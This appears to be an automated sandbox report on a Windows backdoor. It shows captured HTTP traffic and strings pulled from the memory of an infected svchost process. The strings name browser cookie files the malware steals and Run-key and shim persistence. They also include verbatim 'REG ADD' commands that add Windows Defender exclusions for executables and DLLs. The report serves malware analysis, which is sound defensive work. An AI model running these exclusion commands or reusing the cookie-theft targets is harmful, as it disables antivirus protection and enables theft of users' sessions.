User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=51380224-52428799

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:39:00 GMT

Content-Range: bytes 51380224-52428799/53784984

Content-Length: 1048576

Connection: keep-alive
m"...(....Vy........<c.........e..r}...H.A.5...I../.}D.`^;..I.d.t..
.K. ._{...,..M.......S.F .k.s..{QX....!?....>..i7..L.t..{vF=...k..P
.....M..d...........8S.E...Fyc..8..9.._.../..h6.U.]..q...pa........l..
.m\;....U.......O....2.~.J...S.B/..p2.5....rp.....Q..2...C...cYh..]Y.D
xy......8Jv.}....Wo?z*[email protected]......{.K....s..,R....%..t..89.m.{
.z.8.J.xl8.g$...\..=.I.?.....h..E.cqsH..?...*#.C...f....e.^g..p,,...ZF
.%!............%....=3?....l....Z..q..&7gwV.q4........N.....nP".Smu%./
....;.B........C..9P..__...D....P..R.....O..S\[email protected]...$
...n.......)....].=.-J...L >3...ep.w...;....U.3Z...%"...,h.m5.....I
#x.....S.B$.9....'.0O.`...<......~er.eNnrs.)..:c.......d"^SZ.{9...A
[email protected].......;...^....Lq.......P:........a...qFp'........J.
x..r7.._;....Hju....,...zC..jr.:|...&.........J.c.....%..E.|q...SD....
.HV....{yq-......[.........|f.z.S7.q.<K.....,.f......U....r...v...M
...........[...^*/E..T.9A....36.^zIU.O.D'..V..}@.~.m.3J:. .#...|*=%.1.
.&......\T.;...Z.$.{.\1...S.. )C.T.x.r.R.s..x.<W..x'(!L....R*..2._.
l..ar....m..~.....L... Qe:.KP...K..pQ...2....a..*>..i#.......63.tJ.
,.........v..q.rT&.h.UN...........V.k....C>.I.t..-..61.......mU...R
^7.80...y...x.P.$Ig.n9.8.;.... .~..,.. .k.i ....WU..'..au..*.....d.g..
.52....Q..LXV.,.*.......|.*.G.. .....$...K.=.<...z[......A....*....
.L...>g..>.#.#..N..F?....X.......=..g)p.....f.T. [email protected]
..'...R..l....kO...#2&%..bCa.y9.f......T............;7....=<R9Zp...
'[email protected].........`...n..3.....>.....N..$....7.s.|..d.YT.......@.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=53477376-53784983

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:39:01 GMT

Content-Range: bytes 53477376-53784983/53784984

Content-Length: 307608

Connection: keep-alive
i...h....."<6.W..~..-[..C....%9..(;.....C....]&"..6...=.)..dC......
....C...&.i....b..VX../$. shX....2...~.....B..b..Q..i....LUi...>6R.
v.ZSz...."...W..o.._. To.........Z.l.....l.-C.$k5eO.....c.|..s.)w%<
.6..g.C.....y....b..d..".C.............T:"..4.4...!...z h.Y g.....`\..
..>B0.............d.P..N...s....z.7.....D.K.yO.NF..>>....5...
..._..e.....p#..f...z.r<d.Em..n.....}O-......;G%)A..,..v..<.\.f.
....Ck%gN#.....{..J.....fd.h...*.....;..r.,%.k..'.._;.b...A.Eh.e..*$/ 
.......(.........G.^/...J.p..m...JN.QK.k.....i[DP.......(q..........t.
./.,...m..,..Tt.K..ueM.9..e./.tA.T....,.s..M....Q.c/...:.......E.g;...
.JVC7.1...~a.wK.p...aL..!.G...4.P.....Kw.....|....c.Fr....}.*.G...$'.W
....&j........0......\....GD:....x..:w..?.....f^5g....n*....VE.)a.^..h
...4..Ja.3(.dC.^.C...G..j.U..mY.z....BNN."/......o..X^4W.h...GZo*...iN
.ajN.0#....sb.......Kql...lG.'P.U.Z....x.8....hx...9{......G...i.z(.=.
MV...b[..<.'.....[.:.a.T.....@'......5..A..^.0u4=t.[.S...ef..%.f3..
.TP......"....~.G...r..bN....:S......u ..\....L.....6.@e.%cp.d...w.6.6
  I..//0...J....aB...,m..~..O.4=..~*4..}.x...W.6....hag{.w.~.D...s?...
L...y.^....q......F.o>.Dm~..G?F..[..Q......).#.&.E..`}.Xt.K...O;.{=
5;...^wp..A...w..6...Z..U7/...u..An...%....|.....:...,.:...G...`{jw?F.
G(.T)A...>......_.pz^w..^6G.b^q`.!........."...t.7J.........W./.Z3.
....c....#..........}....NpNi.v..y.E..zR..\N.tpJ}....e\...#.E....\..%.
&...a]/g/..$~..9....]i.:...!..P........,O..=..ZC............p..R.....%
....=..W.....$#>...:...7.V.E..L..w..U.X.....V/.....<[..Q..w_
<<< skipped >>>

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:47 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:26 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:34 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:15 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:04 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:45 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:39 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /pca3.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: crl.verisign.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "61c40e5c0bcac2d6da0cc20289056deb:1449628399"

Last-Modified: Wed, 09 Dec 2015 02:09:10 GMT

Date: Tue, 05 Jan 2016 06:39:15 GMT

Content-Length: 933

Connection: keep-alive

Content-Type: application/pkix-crl
0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U
....Class 3 Public Primary Certification Authority..151207000000Z..160
331235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y
.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.....
..fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R
.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....
u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2..
..{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N
....* [email protected]!..Y......w
`G........070411175657Z0!..Z`[email protected].*q..080403172017Z0!..l....I..
.Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1
..7<.....e..010207211822Z0...*.H................M.E..'...z...K.....
V....... ...8......).....u'..1......i/:..........tpN=..1B}HI......=v..
5...e#.W.. 1.c...6...oUX.W.'t[=..W6HTTP/1.1 200 OK..Server: Apache..ET
ag: "61c40e5c0bcac2d6da0cc20289056deb:1449628399"..Last-Modified: Wed,
 09 Dec 2015 02:09:10 GMT..Date: Tue, 05 Jan 2016 06:39:15 GMT..Conten
t-Length: 933..Connection: keep-alive..Content-Type: application/pkix-
crl..0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.17
05..U....Class 3 Public Primary Certification Authority..151207000000Z
..160331235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....
{2..Y.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q
.......fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!....
<<< skipped >>>

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:43 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:38:50 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:17 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:19 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:36 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;.HTTP/1.1 404 Not Found..Server: Apache..Content-Length: 276..Conte
nt-Type: text/html; charset=iso-8859-1..Date: Tue, 05 Jan 2016 06:40:3
6 GMT..Connection: keep-alive..<!DOCTYPE HTML PUBLIC "-//IETF//DTD 
HTML 2.0//EN">.<html><head>.<title>404 Not Found&
lt;/title>.</head><body>.<h1>Not Found</h1>
.<p>The requested URL /get/flashplayer/current/licensing/win/ins
tall_flash_player_11_plugin_32bit.exe was not found on this server.<
;/p>.</body></html>...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:30 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:21 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: fpdownload.macromedia.com

Connection: keep-alive

HTTP/1.1 404 Not Found

Server: Apache

Content-Length: 276

Content-Type: text/html; charset=iso-8859-1

Date: Tue, 05 Jan 2016 06:40:24 GMT

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /ge
t/flashplayer/current/licensing/win/install_flash_player_11_plugin_32b
it.exe was not found on this server.</p>.</body></html&
gt;...

The Backdoor connects to the servers at the folowing location(s):

.text

`.data

.rsrc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

RPCRT4.dll

NETAPI32.dll

ole32.dll

ntdll.dll

RegCloseKey

RegOpenKeyExW

GetProcessHeap

NtOpenKey

svchost.pdb

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

Windows

Operating System

5.1.2600.5512

svchost.exe_1332_rwx_001E0000_00001000:

|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe

svchost.exe_1332_rwx_15190000_0003D000:

`.rsrc

.text

`.rdata

@.data

.reloc

Gh.logWj

h.logPj

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

PeekNamedPipe

SetNamedPipeHandleState

WaitNamedPipeA

kernel32.dll

ExitWindowsEx

user32.dll

RegCloseKey

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExA

RegQueryInfoKeyA

advapi32.dll

modules.dll

GetWindowsDirectoryA

{X-X-X-X-XX}

ntdll.dll

shlwapi.dll

SHDeleteKeyA

SOFTWARE\Microsoft\Windows\CurrentVersion

shell32.dll

%CommonProgramFiles%

\/*.*

\\.\pipe\

VWRQRh.exe

h.exe

ws2_32.dll

RegCreateKeyExA

ShellExecuteA

gdi32.dll

ole32.dll

rmnsoft.dll

google.com:80

bing.com:80

yahoo.com:80

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Windows Defender

Software\Microsoft\Windows\CurrentVersion\Policies

Software\Microsoft\Windows\CurrentVersion\Policies\Associations

Software\Microsoft\Windows\CurrentVersion\policies\system

\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

"ntdll.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows\CurrentVersion\Run

HTTP/*.*

/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Referer: %s

Content-Type: multipart/form-data; boundary=%s

Content-Length: %d

Content-Disposition: form-data; name="%s"

--%s--

%s /%s HTTP/1.1

Host: %s

User-Agent: %s

%sAccept-Language: %s

HTTP/1.x 301 Moved Permanently

Server: Apache/2.2.14

gdiplus.dll

GdiplusShutdown

\\.\131D2408D44C4f47AC647AB96987D4D5

\Google\Chrome\User Data\Default\Cookies

\Google\Chrome\User Data\Default\Extension Cookies

%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist

%APPDATA%\Mozilla\Firefox\

%WinDir%\Application Data\Mozilla\Firefox\

profiles.ini

Profile%d

\cookies.txt

\cookies.sqlite

%APPDATA%\Opera\

\profile\cookies4.dat

\cookies4.dat

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe

FireFox Cookies\Profile %d\cookies.txt

FireFox Cookies\Profile %d\cookies.sqlite

Chrome\Cookies

Chrome\Extension Cookies

Opera\Profile %d\cookies4.dat

Safari\Cookies.plist

1etexec

complete.dat

<"<(<.<4<:<@<

SRQVWh.exe

h.exeVj

h.exeh$~

tvh.exe

PSSSSSSh

More information: hXXp://VVV.ibsensoftware.com/

Advapi32.dll

RegDeleteKeyExA

com.%s.sdb

%s\cmd.%s.bat

start "" "%s"

"%%windir%%\%s\iscsicli.exe"

/q "%s"

\system32\sdbinst.exe"

SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\

SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\

\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb

/q /u "%s"

SOFTWARE\Microsoft\Windows NT\CurrentVersion\

SOFTWARE\Microsoft\Updates\Windows XP\SP4

SOFTWARE\Microsoft\Updates\Windows XP\SP3

SOFTWARE\Microsoft\Updates\Windows XP\SP10

SOFTWARE\Microsoft\Updates\Windows XP\SP0

SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages

:Zone.Identifier:$DATA

:Zone.Identifier

svchost.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0

spoolsv.exe

..\p.exe

CheckBypassed ok

loader.exe

_CheckBypassed@0

|GetWindowsDirectoryA

\/{X-X-X-X-XX}

|ZwDelayExecution

%ProgramFiles%\Internet Explorer\iexplore.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

http\shell\open\command

chrome.exe

opera.exe

cmd.exe

/C ""%s"" %s

/C ""%s""

user32.DLL

p.exe

Rapport

1onsent.exe

&.bAp

%Program Files%\Internet Explorer\iexplore.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe

GetProcessHeap

RegEnumKeyA

RegOpenKeyA

ShellExecuteExA

SetWindowsHookExA

UnhookWindowsHook

EnumWindows

.rdata

.rsrc

*HI0.XF

PF8-.XU

O3$dS7"%U9

KERNEL32.DLL

multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://

2.1.0.3

iscsicli.exe

RedirectEXE

%temp%\..\..\LocalLow\cmd.%username%.bat

emsseces.exe

svchost.exe_1332_rwx_20010000_00001000:

.text

`.rdata

@.data

.reloc

svchost.exe_432:

.text

`.data

.rsrc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

RPCRT4.dll

NETAPI32.dll

ole32.dll

ntdll.dll

RegCloseKey

RegOpenKeyExW

GetProcessHeap

NtOpenKey

svchost.pdb

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

Windows

Operating System

5.1.2600.5512

svchost.exe_432_rwx_002B0000_00001000:

|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe

svchost.exe_432_rwx_15190000_0003D000:

`.rsrc

.text

`.rdata

@.data

.reloc

Gh.logWj

h.logPj

ConnectNamedPipe

CreateNamedPipeA

